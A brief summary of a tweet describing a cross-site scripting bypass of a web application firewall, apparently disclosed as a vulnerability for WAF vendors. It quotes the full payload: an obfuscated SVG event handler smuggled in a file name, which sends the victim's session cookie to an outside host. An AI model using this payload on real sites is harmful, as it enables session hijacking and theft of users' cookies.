This tweet describes an XSS WAF bypass using the payload '10006630~!~/[redacted]/a/unix/apps/WAS/FileService/files/[redacted]/2023/9/21~!~xss"><svg><set onbegin="d=document,b='`',d['loca'+'tion']='//bxmbn.com/?'+b+cookie+b> .png~!~649159'. The tweet mentions that the filename was used for the bypass to take over the session. It is a critical vulnerability that should be addressed by WAF vendors. For more technical details, refer to the tweet.
Original tweet: https://twitter.com/MiniMjStar/status/1893760360722649279